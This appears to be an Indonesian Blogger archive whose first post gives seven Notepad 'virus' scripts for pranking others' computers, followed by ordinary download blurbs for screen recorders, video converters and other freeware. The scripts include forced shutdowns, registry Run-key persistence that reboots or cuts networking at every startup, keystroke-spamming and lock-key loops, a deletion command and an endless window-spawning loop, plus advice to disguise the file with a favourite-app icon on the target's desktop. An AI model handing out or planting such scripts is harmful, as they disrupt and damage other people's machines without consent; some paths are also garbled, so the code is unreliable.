Friday, April 28, 2017

7 Script Hacking Membuat Virus Sederhana dengan Notepad

Posted by DEDE KURNIAWAN on 4/28/2017 10:19:00 AM


Siapa sih yang tidak takut dengan virus di komputer? Saat komputer terkena virus, maka besar kemungkinan komputer kamu jadi tidak bisa digunakan. Apalagi jika komputer kamu kena salah satu dari 20 virus komputer paling berbahaya di dunia. Tamat sudah, antara harus beli komputer baru atau install ulang.
Di balik seramnya serangan virus komputer, maka JalanTikus berikan kamu kumpulan script hacker untuk membuat virus komputer sederhana. Mau nggak? Biar kelihatan pintar kayak hacker profesional gitu. Simak 7 script hacking membuat virus sederhana dengan notepad.

7 Script Hacking Membuat Virus Sederhana

Sudah tahu virus komputer itu berbahaya, kok JalanTikus bagikan cara membuat virusnya sih? Ya karena virus komputer yang JalanTikus bagikan ini cuma berisi script sederhana yang akan mengacaukan fungsi komputer tanpa merusak hardware atau membocorkan informasi yang ada di dalamnya. Jadi aman dan cocok untuk digunakan menjahili komputer teman kamu.

1. Membuat Virus Shutdown

Cara kerja virus komputer sederhana ini adalah dengan memaksa komputer teman atau target jadi Shutdown. Untuk melakukannya, silakan buka Notepad, dan copy paste kode di bawah. Lalu save file-nya dengan nama ForceShutdown.bat dan type file-nya All file.
  1. @echo off
  2. msg * I don't like you
  3. shutdown -c "Error! Komputer kamu terpaksa harus Shutdown!" -s
Untuk mengaktifkan virus ini, kamu harus klik 2 kali pada file-nya. Maka, secara otomatis virus ini akan berjalan.

2. Paksa Shutdown Setiap Kali Dinyalakan

Berbeda dengan virus sebelumnya, virus sederhana yang ini akan memaksa komputer teman kamu untuk Shutdown setiap kali dinyalakan. Eits, jangan asal gunakan virus ini kalo gak siap tanggung akibatnya ya!
  1. echo @echo off>c:windowshartlell.bat
  2. echo break off>>c:windowshartlell.bat
  3. echo shutdown -r -t 11 -f>>c:windowshartlell.bat
  4. echo end>>c:windowshartlell.bat
  5. reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v startAPI /t reg_sz /d c:windowshartlell.bat /f
  6. reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v /t reg_sz /d c:windowshartlell.bat /f
  7. echo You have been HACKED.
  8. PAUSE
Simpan file buatan kamu di atas dengan nama apapun. Jangan lupa gunakan ekstensi .bat ya! Lalu klik untuk mengaktifkannya.

3. Mematikan Internet Secara Permanen

Saat berada di suatu jaringan internet, pasti kesal dong jika ada orang yang malah download? Bikin internet lemot karena bandwith berkurang cepat. Makanya, coba matikan internet teman kamu menggunakan script virus sederhana berikut:
  1. echo @echo off>c:windowswimn32.bat
  2. echo break off>>c:windowswimn32.bat
  3. echo ipconfig/release_all>>c:windowswimn32.bat
  4. echo end>>c:windowswimn32.bat
  5. reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
  6. reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
  7. echo You Have Been HACKED!
  8. PAUSE
Seperti biasa, simpan dengan nama apapun dan gunakan ekstensi .bat. Lalu klik untuk mengaktifkannya!

4. Virus Caps Lock

Siapa yang tidak kesal jika ada orang ngetik isinya huruf besar semua? Orang yang menerima pesan dengan huruf besar semua jelas akan merasa terganggu, atau bahkan marah. Makanya, yuk isengin teman kamu dengan membuat tombol Caps Lock-nya nyala terus menggunakan script virus sederhana berikut:
  1. Set wshShell =wscript.CreateObject("WScript.Shell")
  2. do
  3. wscript.sleep 100
  4. wshshell.sendkeys "{CAPSLOCK}"
  5. loop
cara-membuat-virus-sederhana-dengan-notepad-4
Copy dan paste kode di atas ke Notepad, lalu simpan dengan nama file ForceCapsLock.vbs dan type file-nya All file. Klik 2 kali untuk mulai mengaktifkan virus komputer sederhana ini.

5. Virus Alay

Siapa bilang cuma anak muda kekinian doang yang bisa alay? Komputer kamu juga bisa alay loh kalo terinspeksi virus keyboard alay. Nah, untuk membuat virus komputer yang akan membuat keyboard jadi alay, kamu bisa gunakan script berikut:
  1. Set wshShell =wscript.CreateObject("WScript.Shell")
  2. do
  3. wscript.sleep 100
  4. wshshell.sendkeys "{CAPSLOCK}"
  5. wscript.sleep 100
  6. wshshell.sendkeys "{NUMLOCK}"
  7. wscript.sleep 100
  8. wshshell.sendkeys "{SCROLLLOCK}"
  9. loop
cara-membuat-virus-sederhana-dengan-notepad-3
Caranya sama, copy dan paste kode di atas ke Notepad. Lalu save dengan nama ForceAlay.vbs dan type file All file.
Cara Membuat Virus Komputer Sederhana Berikut Solusinya (Part 3)

6. Virus Orang Jelek

Dikatain jelek itu emang nyebelin. Kalo cuma sekali dua kali sih harusnya masih bisa ditahan, tapi kalo terus-terusan ngatain jelek gimana coba? Nah, dengan kode di bawah ini, kamu bisa membuat sebuah virus komputer sederhana yang akan memaksa komputer target untuk mengeluarkan alert bahwa 'dia jelek' tanpa henti.
  1. Set wshShell = wscript.CreateObject("WScript.Shell")
  2. do
  3. wscript.sleep 100
  4. wshshell.sendkeys "Muka Lu Jelek Kayak Komputer Lu"
  5. loop
cara-membuat-virus-sederhana-dengan-notepad-1
Copy dan paste script virus sederhana di atas ke Notepad. Oh iya, kamu bisa ganti bagian warna merah dengan kata-kata sesuai selera, lalu save dengan nama VirusOrangJelek.vbs.

7. Virus Kuis

Semua orang suka kuis apalagi kalo berhadiah. Tapi kamu bakal kesal deh pasti kalo setiap kali mau buka komputer, ternyata yang nongol adalah kuis. Ya kan? Buat kamu yang mau isengin komputer target dengan kuis-kuis menyebalkan, coba kamu gunakan script berikut:
  1. @echo off
  2. title Kuis hari ini!
  3. :menu
  4. cls
  5. echo Jika kamu kena virus apa yang kamu lakukan?
  6. pause
  7. echo pilih yang mana:
  8. echo 1. Matiin komputer
  9. echo 2. Format aja
  10. echo 3. Nangis
  11. echo 4. Beli komputer baru
  12. set input=nothing
  13. set /p input=Choice:
  14. if %input%==1 shutdown -s -t
  15. 30
  16. if %input%==2 del c:xxx
  17. if %input%==3 @ECHO off
  18. msg * Muka lu jelek
  19. msg * Ngaca dulu gih!
  20. msg * Hayo lu, CPU lu gw acak-acak ya
  21. msg * Udah, install ulang aja
  22. msg * Mau kelar kan masalahnya?
  23. @ECHO off
  24. :top
  25. START %SystemRoot%
  26. system32notepad.exe
  27. GOTO top
cara-membuat-virus-sederhana-dengan-notepad-2
Copy dan paste deh ke Notepad dengan nama ViruzQuiz.bat. Selesai, tinggal jalankan untuk mengujinya.
Agar berjalan lancar, coba simpan file virus komputer sederhana yang kamu buat di komputer target. Lalu letakkan file tersebut di desktop, dan jangan lupa ubah ikon shortcut-nya jadi aplikasi favorit target.
Mudah, bukan? Selamat mencoba!

Download Software Perekam Layar Komputer Terbaik di Windows

Posted by DEDE KURNIAWAN on 4/28/2017 10:15:00 AM


Ada saat di mana kita diharuskan untuk merekam aktivitas layar komputer menjadi sebuah video. Misalnya saja untuk membuat video tutorial, merekam game, presentasi, momen istimewa, dan keperluan lainnya. Maka dari itu, kamu membutuhkan software perekam layar komputer terbaik untuk mendapatkan hasil rekaman video yang berkualitas.

Dilansir dari Tech Viral, software screen recorder sendiri adalah aplikasi yang dirancang khusus untuk merekam suatu kegiatan yang ada pada sebuah layar komputer atau laptop. Beberapa fitur penting yang harus diperhatikan adalah dukungan format video, kualitas video, dan suaranya. Langsung saja, berikut 7 software perekam layar komputer terbaik di Windows.

1. Open Broadcaster Software


Open Broadcaster Software atau disingkat OBS adalah salah satu software perekam layar komputer terbaik. OBS ini Open Source dan multi-platform, kamu dapat memasangnya di Windows, OSX, ataupun GNU/Linux. Dengan ini, kamu dapat menggunakannya untuk merekam video ataupun broadcast video ke berbagai situs online secara langsung (live streaming).
Antarmuka penggunanya sangat sederhana, tetapi punya banyak fitur. Seperti merekam desktop, merekam suara dari internal microphone ataupun external microphone, merekam webcam bawaan, ataupun merekam webcam external. Kamu dapat memodifikasi secara langsung dengan mengatur area seleksi rekaman dan bahkan dapat menambahkan text ataupun gambar pada live streaming kamu. Kamu dapat menyimpan hasilnya ke dalam format MP4 atau FLV.

2. Action!


Software perekam layar komputer terbaik selanjutnya Action!, keunggulannya mampu melakukan streaming secara real-time dan merekam video yang sangat baik pada resolusi HD. Fiturnya juga banyak seperti untuk merekam video, suara bahkan dapat digunakan untuk mengambil gambar dengan sangat cepat (screenshot) yang sangat cocok digunakan untuk memotret gambar yang ingin digunakan untuk tutorial.
Sebelum merekam layar monitor, kamu dapat mengatur dulu resolusi video hingga 1080p. Fitur lainnya dari Action! ini adalah kamu dapat memilih menu untuk merekam layar penuh, merekam game, bisa dipula diatur untuk merekam sebagian layar monitor. Format yang dihasilkan dari Action! ini adalah MP4 dan AVI.

3. XSplit Gamecaster


Keunggulan XSplit Gamecaster adalah menawarkan fitur streaming yang kuat. XSplit mampu menayangkan streaming ketika kita sedang bermain game dengan lancar dan sangat stabil. Kamu dapat mulai merekam dengan menekan satu tombol saja. Menariknya, XSplit akan mengonfigurasi pengaturan yang sesuai dengan laptop yang kamu gunakan.

4. Dxtory


Dxtory adalah software perekam layar komputer yang ringan dengan antarmuka dan pengaturan yang sangat sederhana. Dxtory ini mampu mengangkat video pada kualitas tertinggi sesuai dengan kemampuan laptop kamu. Pengaturan audionya juga cukup kuat dan mampu merekam dua suara secara bersamaan, misalnya suara dari game dan suara kamu yang kemudian dapat diedit secara terpisah.

5. WM Capture


Kelebihan WM Capture adalah kamu dapat dengan mudah merekam video pada bagian layar tertentu dan memiliki fitur schedule recording. Dengan begitu, kamu bisa menjadwalkan kapan layar komputer memulai rekaman. Jadi kamu bisa mengatur agar software berjalan otomatis sehingga dapat merekam acara live streaming ketika kamu tidak menontonnya. Hasil file dapat disimpan ke dalam format MPEG, WMV, AVI, DVD-ISO, dan lainnya.

6. ShadowPlay


ShadowPlay adalah hardware accelerated screen recording untuk PC berbasis Windows yang menggunakan GPU GeForce yang dibuat oleh Nvidia. Salah satu daya tarik dari ShadowPlay adalah kemampuan merekam mundur hingga 20 menit ke belakang. Dengan menekan shortcut, maka kamu menandakan akhir video dan graphics card akan merekam mundur ke belakang hingga sepanjang 20 menit. Alhasil momen berharga yang baru saja terlewat dapat diabadikan dalam bentuk video yang disimpan pada format MP4 dan menggunakan codec H.264.

7. Windows 10 Game Bar


Buat kamu pengguna Windows 10 tidak perlu lagi kesulitan untuk merekam layar PC, karena Windows 10 menyediakan sebuah fitur bernama Windows 10 Game Bar atau Game DVR yang dapat merekam layar secara mudah tanpa perlu bantuan apa pun. Kamu yang ingin merekam layar PC secara cepat dapat menggunakan fitur Game DVR. Cara ini hanya dapat merekam satu jendela saja sehingga jendela lain tidak akan ikut terekam ketika kita buka.
Salah satu kelebihan lainnya yakni hasil video rekaman tidak berukuran terlalu besar. Game DVR kini juga menjadi salah satu pilihan para YouTuber untuk merekam layar PC ketika bermain game. Caranya tekan Windows + G pada layar jendela yang ingin direkam.
Itulah 7 software perekam layar komputer terbaik untuk Windows. Dengan ini, kamu dapat dengan mudah merekam video tutorial ataupun merekam momen terbaik saat bermain game. Apakah kamu punya jagoan lain selain dari daftar di atas? Tambahkan di kolom komentar ya.

Tuesday, April 18, 2017

Downlaod Software Daum PotPlayer 1.7.1915 terbaru

Posted by DEDE KURNIAWAN on 4/18/2017 02:07:00 PM

Daum PotPlayer merupakan multimedia player yang sangat ringan untuk Windows.Mendukung hampir semua format video yang tersedia. PotPlayer berisi codec internal dan tidak perlu menginstal codec secara manual.
Tampilannya yang menarik di dominasi warna hitam metalic yang lebih nyaman serta dukungan media yang sangat lengkap.
Selain itu software pemutar video ini memiliki desain yang stylish dan trendi yang tentu saja akan menarik para user. Tetapi bagi kita yang penting tool ini mempunyai fungsi dan kemudahan yang sangat lengkap, sederhana, user-friendly dengan berbagai pengaturan Daum PotPlayer. Pengguna aplikasi ini memiliki akses untuk untuk mengambil screenshot dari video yang dipecah menjadi frame, merekam suara dalam berkas terpisah dan banyak fitur lainnya. Ada juga pilihan untuk mengaktifkan efek visual saat memutar file audio, dan juga untuk memasukkan teks. Anda juga dapat mengubah tampilan pemutar. Dan pengaturan tambahan yang cukup banyak, akan secara signifikan meningkatkan kualitas mendengarkan media audio.

Fitur utama dari Daum PotPlayer:
1.Dukungan untuk seluruh format audio / video.
2.Video codec internal DXVA (H.264/AVC, VC-1, MPEG2) dan EVR (Windows 7/8).
3.Kualitas gambar dan suara yang jernih
4.Mendukung semua jenis subtitle.
5.Skins, logo, warna tema.
6.Support untuk TV perangkat digital dan Siaran live.
7.Penggunaan Recource CPU yang rendah

Lisensi Freeware
Developer DVB Support
Sistem Operasi Windows XP/Vista/7/8/10

Downlaod Software DriverPack Solution 17.7.33.4 terbaru

Posted by DEDE KURNIAWAN on 4/18/2017 02:04:00 PM


DriverPack Solution adalah program yang berisi kumpulan-kumpulan driver untuk VGA, Chipset, SoundCard, LanCard, Wifi, Printer, dll. Bisa digunakan untuk semua versi windows (32/64 bit) yang dapat anda gunakan di berbagai macam komputer dan laptop.
Kesulitan dalam mencari driver merupakan salah satu kendala besar dalam proses install ulang PC ataupun laptop kita. Drivers ini sangat penting sebab tanpa adanya driver, hardware-hardware yang terpasang pada perangkat kita tidak akan berfungsi dengan normal karena fungsi driver yang sebenarnya untuk menghubungkan antara hardware dan software.

Salah satu keunggulan Driver Pack Solution yaitu mampu melakukan update driver dengan mudah secara offline, anda bisa melakukan update driver dengan cepat tanpa menggunakan koneksi internet, hal itu karena anda telah mengunduh semua database driver yang diperlukan, database driver yang telah anda download tersebut berisi berbagai driver yang telah diupdate ke versi yang terbaru.

 
Bagi anda yang sering melakukan install ulang PC dan laptop atau anda para teknisi komputer maka anda wajib memiliki software berbentuk ISO ini, hal itu akan sangat memudahkan anda dalam hal melakukan update driver dan mendapatkan update driver terbaru untuk semua hardware yang terpasang pada komputer termasuk driver printer, webcam dan lainnya.


Lisensi Freeware
Developer Artur Kuzyakov
Sistem Operasi Windows XP/Vista/7/8/10

Saturday, April 15, 2017

Downlaod Software / Aplikasi Bingkai Foto atau Frame Keren dan Cantik

Posted by DEDE KURNIAWAN on 4/15/2017 10:47:00 AM

Suatu saat kamu mungkin ingin menggabungkan foto kamu dengan foto idola kamu atau hanya sekedar ingin menambahkan sebuah bingkai/ frame agar foto terlihat cantik dan menarik.
Kami telah menyeleksi beberapa web editor foto yang kami anggap baik dalam kemudahaan penggunaan, hasil foto yang baik, dan koleksi bingkai atau frame dan background yang lengkap untuk menciptakan efek khusus.
Secara garis besar semua web yang kami dapati memiliki kesamaan dalam penggunaan, kamu cukup mengupload foto kamu ke web lalu pilih salah satu dari banyak bingkai/ frame yang kamu anggap bisa membuat foto kamu lebih cantik dan menakjubkan, terakhir simpan dan download hasilnya.

Aplikasi Bingkai Foto

1. Pho.to

Dengan Pho.to kamu dapat bermain-main dengan berbagai efek foto, frame, kartu pos dan template kolase untuk meningkatkan citra kamu adalah seorang bintang. Selain itu, Pho.to memiliki editor foto yang dapat membantu kamu retouch foto sebelum menggunakannya. Kamu akan menemukan berbagai sampul majalah yang bisa kamu gunakan.

2. Photofacefun.com



PhotoFaceFun merupakan salah layanan online terbaik di dunia untuk editing gambar dan foto. Di sini kamu akan mendapati banyak efek, bingkai foto, filter gambar dan alat-alat lain yang dikembangkan untuk mengedit gambar atau foto kamu. Ada berbagai pilihan efek gambar yang memungkinkan kamu dan teman kamu bersenang-senang dalam editing foto.

3. Adornpic.com


AdornPic adalah editor foto online untuk foto DIY (Do It Yourself). Kamu dapat menghiasi gambar kamu di sini. AdornPic memberikan banyak kemudahan dengan banyaknya fitur, stiker, efek foto, frame, touch-up, dan banyak lagi. AdornPic dapat  digunakan untuk membuat ecards dan kolase.

4. Funphotobox.com


FunPhotoBox.com adalah alat editing foto online di mana kamu dapat membuat gambar lucu dari fotomu. Kamu hanya perlu meng-upload foto dan terapkan ratusan efek foto yang dirancang secara profesional.

5. Fotor.com


Di fotor, kamu dapat menggunakan berbagai desain dan gaya yang luar biasa, Frame atau bingkai, desain dan kolase sentuhan yang sempurna. Coba semua fitur dan efek yang berbeda yang ada di fotor untuk menciptakan sesuatu yang benar-benar mengagumkan.

6. Pixiz.com

 
Pixiz adalah cara termudah dan terlucu untuk membuat kenangan kamu lebih menakjubkan, unik dan tak terlupakan. Pilih di antara banyak frame, layout kolase dan filter untuk kamu berkreativitas dalam editing foto. Di Pixiz terdapat lebih dari 500.000 bingkai yang bisa kamu gunakan untuk setiap kesempatan dan setiap suasana hati.

7. Picjoke.net



Picjoke merupakan gratis foto editor online yang memiliki banyak fitur seperti efek foto yang menyenangkan, bingkai foto, kolase bagus dan foto montase. Picjoke adalah situs editing foto lucu dan mudah digunakan. Pada editor foto di Picjoke, kamu dapat berbagi foto di jejaring sosial yang berbeda. Teman dan kenalan akan terkejut dengan gambar dan foto hasil kamu edit disini. Dan semua ini berkat photo editor online di Picjoke.

8. Ribbet.com



Ribbet merupakan editor foto online gratis dan pembuat kolase dengan filter yang indah, efek musim, touch-up, stiker dan font. Ribbet juga tersedia sebagai apps pada beberapa sosial media yang memungkinknan kamu mengedit foto dan membuat kolase foto langsung dari Facebook, Flickr, Web Album Picasa.

Download HeiDoc.net Software file image ISO Windows dan OffIce versi

Posted by DEDE KURNIAWAN on 4/15/2017 10:39:00 AM

Jika kamu perlu melakukan instalasi bersih dari sistem operasi Windows, kamu mungkin memahami bahwa mencari sebuah disk image yang tidak dimodifikasi (crack) di internet bisa menjadi kegiatan yang membosankan.

Sebagai alternatifnya kamu dapat menggunakan aplikasi pihak ketiga khusus seperti Windows ISO Downloader. Aplikasi ini dapat membantu kamu mendownload file image ISO Windows versi apapun dengan cepat dan mudah.


Harap dicatat kamu memerlukan Framework .NET dan Internet Explorer agar fungsi aplikasi ini dapat digunakan secara maksimal.

Tidak memerlukan instalasi

Karena ini merupakan aplikasi portable, maka tidak memerlukan instalasi pada komputer. Kamu cukup menjalankan file exe-nya.
Selain itu kamu juga dapat menjalankannya dari berbagai media penyimpanan portable seperti USB flash drive atau HDD eksternal. Aplikasi tidak melakukan perubahan apapun pada file registry Windows dan tidak menghasilkan file tambahan atau folder pada PC kamu tanpa izin eksplisit dari kamu.

Tampilan yang user-friendly

Windows ISO Downloader hadir dengan tampilan yang sederhana, user-friendly dimana terdapat beberapa fungsi yang dapat dengan mudah kamu gunakan. Pada jendela utama kamu dapat melihat daftar versi Windows dan Microsoft Office dimana kamu dapat memilih dengan mengklik tombol radio yang sesuai sesuai versi yang kamu inginkan.
Aplikasi ini tidak memerlukan aplikasi tambahan karena tujuan aplikasi ini cukup sederhana yaitu membantu kamu mendownload file image Windows atau Microsoft Office yang tidak dimodifikasi dari internet secepat mungkin.
Setelah memilih versi kamu harus memilih edisi dan bahasa dari menu drop-down dan mengkonfirmasi pilihan kamu. Aplikasi ini memungkinkan memberikan dua pilihan untuk mendapatkan file iso, pertama dengan mendownload file image secara langsung atau menyalin link download ke clipboard untuk digunakan nanti.

Download Software Advanced Renamer 3.76

Posted by DEDE KURNIAWAN on 4/15/2017 10:34:00 AM



Advanced Renamer adalah software yang digunakan untuk mengubah nama beberapa file dan folder secara massal/bersamaan.
Untuk mengganti nama sebuah file/folder di Komputer PC/Laptop sangat mudah. Bisa dengan cara klik kanan file tersebut lalu klik menu Rename, atau dengan menekan tombol F2 pada keyboard. Tapi urusannya lain jika harus mengganti nama file/folder lebih dari satu atau bahkan ribuan file/folder, tentunya akan kerepotan bila harus mengganti atau mengatur nama file-file menggunakan cara biasa.
Agar lebih efisien, kita bisa menggunakan software tertentu yang memang khusus untuk pekerjaan penggantian nama file (Sekaligus), seperti aplikasi freeware Advance Renamer.
Advanced Renamer juga mendukung undo mengubah nama batch untuk membalikkan proses dan membatalkan pekerjaan penggantian nama Anda jika Anda pernah mengubah nama file dengan nama yang salah karena kesalahan.
Hal yang sering kita hadapi pada saat ada ribuan lagu yang akan kita rename menjadi format software karaoke dzone, maka software ini merupakan solusinya.
Sangat mudah untuk menangani pekerjaan batch dengan menggunakan beberapa metode pada sejumlah besar file. Ada 13 metode berbeda yang memungkinkan Anda untuk mengubah nama, atribut, dan timestamp file dan dapat disalin atau dipindahkan ke lokasi baru berdasarkan informasi dalam file.
Anda dapat membuat nama file baru dengan menambahkan, menghapus, mengganti, mengubah case, atau memberikan file nama baru berdasarkan informasi file.
Sebelum melakukan operasi pada file dengan terlebih dahulu memverifikasi output tujuan rename file dan Anda dapat membatalkan batch seperti semula.
Advanced Renamer mampu menangani segala macam file seperti Image File/Gambar/Foto, Data GPS, File Musik dan Video.

Lisensi Freeware
Developer Kim Jensen
Sistem Operasi Windows XP/Vista/7/8/10

Downlaod Software SketchUp Make 17.2.2555 | desain grafis 3D

Posted by DEDE KURNIAWAN on 4/15/2017 10:30:00 AM


SketchUp Make adalah aplikasi desain grafis untuk membuat dan memodifikasi berbagai jenis model 3D dengan cepat dan mudah.

Ketika bekerja dalam bidang desain, seperti desain interior, maka biasanya diperlukan sebuah program atau software yang mampu membuat desain dengan mudah dan cepat.
SketchUp Make merupakan software atau aplikasi yang dapat kita gunakan untuk melakukan atau merancang sebuah bangunan seperti Rumah, Gedung, atau Kost, dan masih banyak lainnya.dirancang untuk arsitek, insinyur sipil, pembuat film, game developer, dan profesi terkait.
Berbagai fitur disertakan dalam program ini, termasuk perangkat untuk menggambar (drawing), efek dan tektur. Dengan berbagai perangkat tersebut, pengguna bisa membuat gambar 3D tanpa batas, termasuk untuk desain arsitektur, map atau blueprint.
Gambar atau images yang didukung oleh program ini antara lain JPG, PNG, TIF, BMP, SKP atau DEM. Sedangkan untuk menyimpan, format yang didukung adalah SKP, BMP, JPG, PNG, TIF, DAE dan KMZ.

Beberapa kelebihan dan Fitur SketchUp Make :
1.Interface yang menarik dan simpel
2.Mudah digunakan oleh golongan pemula sekalipun
3.Banyak open source plugin yang mendukung dan melengkapi kinerja sketchup
4.Terdapat fitur import file ke ekstensi 3ds (untuk 3ds max), dwg (untuk autocad), kmz (untuk google earth), pdf, jpg, bmp, dxf, dan lain-lain.

Lisensi Freeware
Developer Trimble Navigation Limited
Sistem Operasi Windows XP/Vista/7/8/10

Downlaod Software Freemake Video Converter 4.1.9.83 | software Converter video terlengkap

Posted by DEDE KURNIAWAN on 4/15/2017 10:22:00 AM

Freemake Video Converter adalah software Converter video gratis yang bisa mengubah beberapa format video ke berbagai format video lainnya misalnya MP4, 3GP, MPEG, DVD, AVI, konversi video ke audio dan gambar menjadi video.


Beberapa Fitur Freemake Video Converter :
1.Mendukung input lebih dari 200 format, baik video, audio maupun gambar (images). Seperti misalnya : AVI, MP4, MKV, WMV, MPG, 3GP, 3G2, SWF, FLV, TOD, AVCHD, MOV, DV, RM, QT, TS, MTS (video) MP3, AAC, WMA, WAV (Audio) JPG, BMP, PNG,GIF (gambar)
2.Mendukung berbagai Output atau keluaran, seperti AVI, WMV, MP4, MKV, FLV, SWF, 3GP dan juga MP3
3.Konversi lebih dari 50 situs video online (streaming) dengan hanya memasukkan URL video tersebut, seperti dari YouTube, Facebook, Vimeo, Dailymotion dan lainnya.
4.Konversi video untuk berbagai media seperti : Apple, Sony dan Android.
5.Konversi video lebih cepat dengan adanya fitur CUDA dan juga DXVA (untuk pengguna hardware komputer tertentu)
6.Konversi ke Blu-ray video
7.Bisa menambahkan subtitle (SSA, SRT atau ASS) untuk input video DVD, MKV dan MOV
8.Terintegrasi fitur Audio editor seperti Cut, Join, Rotasi, Limit ukuran, dan menyesuaikan aspek rasio tampilan video.
9.Tersedia berbagai pilihan hasil konversi, termasuk untuk membuat setting sendiri.
10.Mengubah Foto menjadi slideshow (video) termasuk bisa menambahkan audio.


Lisensi Freeware
Developer Ellora Assets Corporation
Sistem Operasi Windows XP/Vista/7/8/10

Downlaod Software HandBrake 1.0.7 | software konversi video terlengkap

Posted by DEDE KURNIAWAN on 4/15/2017 10:20:00 AM

Handbrake adalah software konversi video yang mendukung banyak format yang dirancang untuk dapat berjalan pada beberapa sistem operasi yang berbeda (cross/multi-platform), di antaranya Windows (32-bit dan 64-bit), Mac OS (Intel 64-bit), dan Linux.
 

Masalah umum yang ditemui saat ingin memutar video di gadget yaitu keterbatasan dukungan format video. Handbrake hadir untuk membantu mengatasi problem tersebut.
Salah satu fungsi utama yang menjadi pertimbangan dalam memiliki suatu gadget seperti kemampuannya untuk memainkan format audio (.mp3, .wma, .flac) dan video (.mp4, .wmv, .avi, .mkv). Sayangnya, tidak semua berkas video dapat dimainkan karena spesifikasi perangkat keras gadget memang terbatas. Untuk itulah dibutuhkan alat konversi video gratis seperti Program ini.
Format video yang dapat dikonversi yaitu aneka format yang didukung oleh libavformat (pustaka audio/video yang banyak digunakan oleh perangkat lunak multimedia). Dengan kata lain, hampir semua format video populer saat ini sudah didukung oleh Handbrake. Selain itu juga dapat mengkonversi video yang terdapat pada DVD atau blu-ray disc.
Dalam versi ini, banyak sekali penambahan fitur dan perbaikan bug system yang diberikan oleh sang pengembang, Sebagai contoh adalah Intel QuickSync Video, H.265, VP8 dan juga LobFaac.
 
Lisensi Freeware
Developer The HandBrake Team
Sistem Operasi Windows Vista/7/8/10

Daftar Post Terpopuler

RANDOM POST's

Related Posts Plugin for WordPress, Blogger...

MENU POST

Myblog Contents

Facebook Fans Page

  • RSS
  • Delicious
  • Digg
  • Facebook
  • Twitter
  • Linkedin

Search Site